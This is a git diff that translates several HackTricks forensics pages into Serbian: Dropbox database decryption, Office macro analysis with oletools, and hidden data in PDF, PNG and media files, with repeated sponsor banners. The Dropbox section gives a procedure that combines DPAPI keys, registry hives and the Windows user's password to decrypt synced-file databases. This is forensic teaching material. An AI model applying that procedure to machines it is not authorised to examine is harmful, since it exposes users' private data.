-* **Algorithm**: PBKDF2
-* **Iterations**: 1066
+* **Entropija**: d114a55212655f74bd772e37e64aee9b
+* **So**: 0D638C092E8B82FC452883F95F355B8E
+* **Algoritam**: PBKDF2
+* **Iteracije**: 1066
-Apart from that information, to decrypt the databases you still need:
+Osim tih informacija, za dešifrovanje baza podataka vam je još uvek potrebno:
-* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
-* The **`SYSTEM`** and **`SECURITY`** hives
-* The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect`
-* The **username** and **password** of the Windows user
+* **Šifrovani DPAPI ključ**: Možete ga pronaći u registru unutar `NTUSER.DAT\Software\Dropbox\ks\client` (izvezite ove podatke kao binarne)
+* **`SYSTEM`** i **`SECURITY`** registarske ključeve
+* **DPAPI master ključeve**: Koje možete pronaći u `\Users\\AppData\Roaming\Microsoft\Protect`
+* **Korisničko ime** i **lozinku** Windows korisnika
-Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
+Zatim možete koristiti alatku [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
![](<../../../.gitbook/assets/image (448).png>)
-If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
-
-The resulting hex is the final key used to encrypt the databases which can be decrypted with:
+Ako sve ide kako se očekuje, alatka će pokazati **primarni ključ** koji vam je potreban da biste **obnovili originalni ključ**. Da biste obnovili originalni ključ, jednostavno koristite ovaj [cyber\_chef recept](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) stavljajući primarni ključ kao "passphrase" unutar recepta.
+Dobijeni heksadecimalni kod je konačni ključ koji se koristi za šifrovanje baza podataka koje se mogu dešifrovati sa:
```bash
sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
```
+Baza podataka **`config.dbx`** sadrži:
-The **`config.dbx`** database contains:
+* **Email**: Email korisnika
+* **usernamedisplayname**: Ime korisnika
+* **dropbox\_path**: Putanja gde se nalazi Dropbox folder
+* **Host\_id: Hash**: Koristi se za autentifikaciju na oblaku. Može se povući samo sa veba.
+* **Root\_ns**: Identifikator korisnika
-* **Email**: The email of the user
-* **usernamedisplayname**: The name of the user
-* **dropbox\_path**: Path where the dropbox folder is located
-* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
-* **Root\_ns**: User identifier
+Baza podataka **`filecache.db`** sadrži informacije o svim datotekama i fasciklama sinhronizovanim sa Dropbox-om. Tabela `File_journal` sadrži najkorisnije informacije:
-The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
+* **Server\_path**: Putanja gde se datoteka nalazi na serveru (ova putanja je prethodena `host_id`-om klijenta).
+* **local\_sjid**: Verzija datoteke
+* **local\_mtime**: Datum izmene
+* **local\_ctime**: Datum kreiranja
-* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
-* **local\_sjid**: Version of the file
-* **local\_mtime**: Modification date
-* **local\_ctime**: Creation date
+Druge tabele u ovoj bazi podataka sadrže još interesantnih informacija:
-Other tables inside this database contain more interesting information:
-
-* **block\_cache**: hash of all the files and folders of Dropbox
-* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
-* **mount\_table**: Share folders of dropbox
-* **deleted\_fields**: Dropbox deleted files
+* **block\_cache**: heš svih datoteka i fascikli Dropbox-a
+* **block\_ref**: Povezuje heš ID tabele `block_cache` sa ID-em datoteke u tabeli `file_journal`
+* **mount\_table**: Deljeni folderi Dropbox-a
+* **deleted\_fields**: Obrisane datoteke sa Dropbox-a
* **date\_added**
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** uz pomoć najnaprednijih alata zajednice.\
+Dobijte pristup danas:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **oglašavanje vaše kompanije u HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 4dced7582..92f28f576 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -1,63 +1,60 @@
-# Office file analysis
+# Analiza Office fajlova
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** uz pomoć najnaprednijih alata zajednice.\
+Danas dobijte pristup:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
+Za dalje informacije proverite [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Ovo je samo sažetak:
-Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents.
+Microsoft je kreirao mnogo formata za office dokumente, pri čemu su dva glavna tipa **OLE formati** (kao što su RTF, DOC, XLS, PPT) i **Office Open XML (OOXML) formati** (kao što su DOCX, XLSX, PPTX). Ovi formati mogu sadržati makroe, što ih čini metama za phishing i malver. OOXML fajlovi su strukturirani kao zip kontejneri, što omogućava inspekciju kroz dekompresiju, otkrivajući hijerarhiju fajlova i foldera i sadržaj XML fajlova.
-To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges.
+Za istraživanje struktura OOXML fajlova, daje se komanda za dekompresiju dokumenta i struktura izlaza. Tehnike za skrivanje podataka u ovim fajlovima su dokumentovane, što ukazuje na kontinuiranu inovaciju u prikrivanju podataka u okviru CTF izazova.
-For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
-
-Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
+Za analizu, **oletools** i **OfficeDissector** nude sveobuhvatne alate za ispitivanje kako OLE, tako i OOXML dokumenata. Ovi alati pomažu u identifikaciji i analizi ugrađenih makroa, koji često služe kao vektori za isporuku malvera, obično preuzimanje i izvršavanje dodatnih zlonamernih payloada. Analiza VBA makroa može se izvršiti bez Microsoft Office-a korišćenjem Libre Office-a, koji omogućava debagovanje sa prekidnim tačkama i promenljivim vrednostima.
+Instalacija i korišćenje **oletools**-a su jednostavni, sa pruženim komandama za instalaciju putem pip-a i izdvajanje makroa iz dokumenata. Automatsko izvršavanje makroa pokreće se funkcijama poput `AutoOpen`, `AutoExec` ili `Document_Open`.
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
-
-
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** podržane najnaprednijim alatima zajednice.\
+Dobijte pristup danas:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **oglašavanje vaše kompanije u HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index 4a0a11bae..7f4ba4ec8 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -1,52 +1,52 @@
-# PDF File analysis
+# Analiza PDF fajlova
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** uz pomoć najnaprednijih alata zajednice.\
+Dobijte pristup danas:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-**For further details check: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
+**Za dalje detalje pogledajte: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
-The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.
+PDF format je poznat po svojoj složenosti i potencijalu za prikrivanje podataka, što ga čini fokalnom tačkom za izazove forenzike CTF-a. On kombinuje elemente običnog teksta sa binarnim objektima, koji mogu biti komprimirani ili šifrovani, i mogu uključivati skripte u jezicima poput JavaScript-a ili Flash-a. Da biste razumeli strukturu PDF-a, možete se referisati na Didier Stevens-ov [uvodni materijal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), ili koristiti alate poput tekst editora ili PDF-specifičnog editora poput Origami-ja.
-For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:
+Za detaljnije istraživanje ili manipulaciju PDF-ovima, dostupni su alati poput [qpdf](https://github.com/qpdf/qpdf) i [Origami](https://github.com/mobmewireless/origami-pdf). Skriveni podaci unutar PDF-ova mogu biti prikriveni u:
-* Invisible layers
-* XMP metadata format by Adobe
-* Incremental generations
-* Text with the same color as the background
-* Text behind images or overlapping images
-* Non-displayed comments
+* Nevidljivim slojevima
+* XMP formatu metapodataka od strane Adobe-a
+* Inkrementalnim generacijama
+* Tekstu iste boje kao pozadina
+* Tekstu iza slika ili preklapajućih slika
+* Nevidljivim komentarima
-For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
+Za prilagođenu analizu PDF-a, Python biblioteke poput [PeepDF](https://github.com/jesparza/peepdf) mogu se koristiti za izradu prilagođenih skripti za parsiranje. Takođe, potencijal PDF-a za skriveno skladištenje podataka je toliko velik da resursi poput NSA vodiča o rizicima i protivmerama PDF-a, iako više nisu smešteni na originalnoj lokaciji, i dalje pružaju vredne uvide. [Kopija vodiča](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) i kolekcija [tričarija u PDF formatu](https://github.com/corkami/docs/blob/master/PDF/PDF.md) od Ange Albertini-a mogu pružiti dodatno čitanje na ovu temu.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
index 46a9656c5..eea7175ed 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
@@ -1,37 +1,33 @@
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies.
+**PNG fajlovi** su visoko cenjeni u **CTF izazovima** zbog njihovog **bezgubitnog kompresovanja**, što ih čini idealnim za ugradnju skrivenih podataka. Alati poput **Wireshark-a** omogućavaju analizu PNG fajlova razlaganjem njihovih podataka unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije.
-For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants.
+Za proveru celovitosti PNG fajlova i popravku oštećenja, ključan alat je **pngcheck**, koji pruža funkcionalnost komandne linije za validaciju i dijagnostikovanje PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online servisi poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-bazno rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a.
-These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data.
+Ove strategije ističu važnost sveobuhvatnog pristupa u CTF-ovima, koristeći kombinaciju analitičkih alata i tehnika popravke kako bi se otkrili i povratili skriveni ili izgubljeni podaci.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
index 135dd23f0..e3d2ff3bf 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
@@ -1,45 +1,41 @@
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)!
